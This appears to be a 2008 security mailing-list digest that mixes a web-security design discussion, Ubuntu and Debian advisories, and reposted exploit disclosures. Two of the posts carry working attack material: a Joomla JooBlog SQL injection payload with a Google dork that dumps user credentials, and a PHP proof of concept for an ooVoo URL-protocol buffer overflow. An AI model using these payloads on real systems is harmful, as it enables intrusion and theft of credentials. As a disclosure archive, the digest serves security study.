Re [WEB SECURITY] countermeasure against attacks through HTML shared files
Hello, I have revised the paper based on the comments, and put the revised version on the Pomcor site, at http://www.pomcor.com/whitepapers/file_sharing_security.pdf (Watch for a revision date of November 10, there was an earlier version.) The changes include an improvement based on the last post by Bil Corry (see Section 5.1). Thanks for the all the comments! Francisco
Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vuln.
This is not created by me, however, many site are being exploited due to it, so I thought I'd spread the word: http://www.milw0rm.com/exploits/7078 ### Joomla Component com_jb2(PostID) SQL-injetion Vulnerability ### ### #[~] Author : boom3rang #[~] Kosova Hackers Group [www.khg-crew.ws] #[~] Greetz : [EMAIL PROTECTED], KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1. #[!] Module_Name: com_jb2 #[!] Script_Name: Joomla #[!] Google_Dork: inurl:option=com_jb2 PostID ## -- #[~] Example: http://localhost/Path/index.php?option=com_jb2PostID=[exploit] -- #[~] Exploit: -'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/* -- ## #[!] Proud 2 be Albanian #[!] Proud 2 be Muslim #[!] United States of Albania ##
Google Chrome Break
Address spoofing. Already patched. It's in the news last month. Just a reminder, XCON'08 is coming in a week - check http://xcon.xfocus.org/ greetz to drewcopley, drorshalev, zwell, liuyuer, lqa21, and, of course [EMAIL PROTECTED] -- http://liudieyu.com/kissofthedragon.32168816196486005/ To be viewed with Google Chrome Last tested Wednesday, October 29, 2008 at 9:53:18 AM (time zone: UTC/GMT +8 hours) Up-to-date Google Chrome (version: 0.2.149.30) Contents Address spoofing. 1. Address is displayed bbb.org. 2. Contents are not from bbb.org(contents are manipulated). http://twitter.com/liudieyu Google Chrome is still virgin - Right now only had a bunch of D.o.S, and, a buffer overrun if user saves the attacker's webpage.
[USN-669-1] gnome-screensaver vulnerabilities
=== Ubuntu Security Notice USN-669-1 November 11, 2008 gnome-screensaver vulnerabilities CVE-2007-6389, CVE-2008-0887 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: gnome-screensaver 2.14.3-0ubuntu1.1 Ubuntu 7.10: gnome-screensaver 2.20.0-0ubuntu4.3 After a standard system upgrade you need to restart all user sessions on your computer to effect the necessary changes. Details follow: It was discovered that the notify feature in gnome-screensaver could let a local attacker read the clipboard contents of a locked session by using Ctrl-V. (CVE-2007-6389) Alan Matsuoka discovered that gnome-screensaver did not properly handle network outages when using a remote authentication service. During a network interruption, or by disconnecting the network cable, a local attacker could gain access to locked sessions. (CVE-2008-0887) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1.diff.gz Size/MD5:14632 858a17bd71cf1969f89c9f7248840e0b http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1.dsc Size/MD5: 1515 100a66b14d50912bd73b49b6915d849b http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3.orig.tar.gz Size/MD5: 2122211 9c95c9d0ad4c44a215546dd4b95992b0 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_amd64.deb Size/MD5: 1502090 d5bfdd6505afe949c6414fb01dab0bb9 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_i386.deb Size/MD5: 1483824 bcb42c8bb0a73fbc06c5a465a75fa299 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_powerpc.deb Size/MD5: 1499086 d7e65422d70d2ff6405b0472f03b1c1f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.14.3-0ubuntu1.1_sparc.deb Size/MD5: 1486326 bff6d9f48780721f2621a0c6895aa143 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3.diff.gz Size/MD5:25605 044d070d183f0e073dc1ac81945b0cc5 http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3.dsc Size/MD5: 1695 472b10fdbd46177cbe20b58350265d64 http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0.orig.tar.gz Size/MD5: 2320018 db71d89c66fa3a96b3b276403b5bb723 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_amd64.deb Size/MD5: 1587388 6655526c8225d3b139eb36c1cbbf948a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_i386.deb Size/MD5: 1570386 456e6a56f46efac8de675aa906bf70c2 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_lpia.deb Size/MD5: 1569166 c7f1ce80127cd557a78cf9591b36 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_powerpc.deb Size/MD5: 1606010 a65b33b3a95a7d23bcbdd5e894785852 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/g/gnome-screensaver/gnome-screensaver_2.20.0-0ubuntu4.3_sparc.deb Size/MD5: 1576698 1566098fa61738a75ecaf0c98886eac1 signature.asc Description: This is a digitally signed message part
ooVoo 1.7.1.35 (URL Protocol) remote unicode buffer overflow poc
?php /* ooVoo 1.7.1.35 (URL Protocol) remote unicode buffer overflow poc by Nine:Situations:Group::bruiser tested against IE8b/xp sp3 9sg site: http://retrogod.altervista.org/ software site: http://www.oovoo.com/ description: ooVoo is a startup video conferencing and instant messaging application, similar to Skype Video.[1] ooVoo allows video chats with up to 6 participants, and unlike Skype Video, does not use a P2P network.[..] faultmon dump of oovoo.exe processing the url given: ... 04:22:10.875 pid=0E10 tid=0C08 EXCEPTION (first-chance) Exception C005 (ACCESS_VIOLATION reading [005A]) EAX=0066: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBX=00133D44: 6F 00 6F 00 76 00 6F 00-6F 00 3A 00 00 00 0F 00 ECX=: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDX=01D0DC28: 63 00 61 00 6C 00 6C 00-74 00 6F 00 3A 00 00 00 ESP=00133D00: 12 4E 43 00 AA A8 39 06-FF FF FF FF 01 00 00 00 EBP=00133F68: 63 00 63 00 63 00 64 00-64 00 64 00 64 00 65 00 ESI=00133F84: 66 00 00 00 68 B6 A2 01-00 00 00 00 00 00 00 00 EDI=: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EIP=0040DF5A: 3B 48 F4 7F 16 52 8D 04-48 50 E8 89 9A 3F 00 83 -- CMP ECX,[EAX-0C] 04:22:12.015 pid=0E10 tid=0C08 EXCEPTION (first-chance) Exception C005 (ACCESS_VIOLATION writing []) EAX=: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBX=: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ECX=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00 EDX=7C9132BC: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 ESP=00133930: A8 32 91 7C 18 3A 13 00-5C 3F 13 00 34 3A 13 00 EBP=00133950: 00 3A 13 00 7A 32 91 7C-18 3A 13 00 5C 3F 13 00 ESI=: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDI=: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EIP=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00 -- ADD [EAX],AL ... additional notes: oovoo.exe, compiled with /SafeSEH=OFF reg key: HKEY_CLASSES_ROOT\ooVoo\shell\open\command e:\oovoo\oovoo.exe %1 */ $bof=htmla target=\_blank\ href=\oovoo:? . str_repeat(\x0f,258). . \click me/a/html; $fp=fopen(oovoo_poc.html,w+); fputs($fp,$bof); fclose($fp); ? original url: http://retrogod.altervista.org/9sg_oovoo_url_poc.html
Re: [WEB SECURITY] countermeasure against attacks through HTML shared files
Bil, If the browser displayed the file and the user takes no precautions, the file should be in the browser's cache. Yngve Pettersen of Opera is working on a proposed browser specification for Context Cache that would allow cached items to expire/be discarded immediately upon logging out: http://my.opera.com/yngve/blog/2007/02/27/introducing-cache-contexts-or-why-the http://www.ietf.org/internet-drafts/draft-pettersen-cache-context-03.txt An interesting proposal. I know he's looking for feedback on the idea. And of course, all the new stealth modes being built into browsers would also help (they do have use beyond surfing adult-content). To tell you the truth, the original motivation was just that it's not a good idea to have a valid authentication token (the file retrievel session ID) embedded in a URL. Sure, it can show up in logs, referer, etc. If you don't mind JavaScript, it's easy enough to use JavaScript to submit a POST. There is also a more exotic scenario: the attacker reads the authentication token from the user's computer display, as it is shown in the address box of the browser. These days, with a camera phone, the attacker does not have to be James Bond to pull that off. You could insert as the first param random junk that's 100 characters long that will push the real token off-screen. Yes. In any case, I do think now that the file retrieval session ID must remain valid while the login session is valid, in case the browser issues multiple requests for the same file. No, the thing to do here is a one-time, limited duration key. When the browser first hits the download page using the key, the user is assigned an internal session by the file download site, and the one-time key is voided. No replay attacks. The internal session is used for all subsequent requests. And the key is limited in duration (maybe a minute), so if the user's browser dies or can't reach the download site, the key expires after the time limit. Yes, good idea. (I assume that what you mean by key is what I called file retrievel session ID, and the internal session is for the purpose of authenticating subsequent request ***for the same file***, and the user is assigned an internal session by the download site means that such an internal session record is created on the server side, and a cookie referring to the internal session is set in the user's browser; this cookie would be specific to the file, and it would be used in addition to the cookie that authenticates application pages and the cookie that authenticates standard-URL requests for user files.) Actually, I think there may be another case where a browser may issue multiple requests (besides the case where a large file download is interrupted), namely to implement sniffing. A browser may download an initial portion of the file to determine its type, and then download the rest. It's not clear to me why a second request would be needed to download the rest, rather than just continuing the download; but I think I remember seeing some version of IE issue a second request, when downloading MS Office documents. Switching from the one-time key to an internal session ID (as described above) solves these issues. Yes. (Same assumptions.) Thanks! Francisco
[SECURITY] [DSA 1664-1] New ekg packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1664-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 10, 2008 http://www.debian.org/security/faq - Package: ekg Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2008-4776 It was discovered that ekg, a console Gadu Gadu client performs insufficient input sanitising in the code to parse contact descriptions, which may result in denial of service. For the stable distribution (etch), this problem has been fixed in version 1:1.7~rc2-1etch2. For the unstable distribution (sid) and the upcoming stable distribution (lenny), this problem has been fixed in version 1:1.8~rc1-2 of libgadu. We recommend that you upgrade your ekg package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2.diff.gz Size/MD5 checksum:37320 1c357cd857b7ef675a14fe103a0965c9 http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2.orig.tar.gz Size/MD5 checksum: 514073 b4ea482130e163af1456699e2e6983d9 http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2.dsc Size/MD5 checksum: 750 0ff1117467170af0a00db3701bfa3e30 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_alpha.deb Size/MD5 checksum:75020 32743d8f1c90d89e8fa344609bc3dee3 http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_alpha.deb Size/MD5 checksum: 161822 79d864a5bb2b5cf7f099647d92f39a86 http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_alpha.deb Size/MD5 checksum: 320302 758aa135dad96eda3dff591375046982 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_amd64.deb Size/MD5 checksum: 297518 1c9fcbce7540d6ff538f98710de424b2 http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_amd64.deb Size/MD5 checksum: 136580 9ddd7e5e6fb2c3940f426d07bedf3478 http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_amd64.deb Size/MD5 checksum:69742 ce39c6ae5a6b4d6c5f9da1a5b92aee5c arm architecture (ARM) http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_arm.deb Size/MD5 checksum: 135028 c593a1482e5673777dd3b4d1513af5d4 http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_arm.deb Size/MD5 checksum:67986 905284ffdb2f523c175b5b0590e139f5 http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_arm.deb Size/MD5 checksum: 287590 770c154cbe20f9e5ef9a150eba228f63 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_hppa.deb Size/MD5 checksum: 143792 879b7e4fa25861fb4b0138a64b20df1a http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_hppa.deb Size/MD5 checksum: 310140 5187d07159a4bb9937147f411d4e729c http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_hppa.deb Size/MD5 checksum:73874 32e077a057c65aeef4f42028c1beb29e i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_i386.deb Size/MD5 checksum:67326 e69788fafa929636e435a7c498d6cbb2 http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_i386.deb Size/MD5 checksum: 287730 bee66bb3ffa81f8d96a611d594c7e6c9 http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_i386.deb Size/MD5 checksum: 131298 9455116765cded14599b13def2760856 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/ekg/ekg_1.7~rc2-1etch2_ia64.deb Size/MD5 checksum: 394676 5da127623779c65a6882763d124e106e http://security.debian.org/pool/updates/main/e/ekg/libgadu3_1.7~rc2-1etch2_ia64.deb Size/MD5 checksum:86672 df4d5a3e854546b2107829cae3c52758 http://security.debian.org/pool/updates/main/e/ekg/libgadu-dev_1.7~rc2-1etch2_ia64.deb Size/MD5 checksum: 158010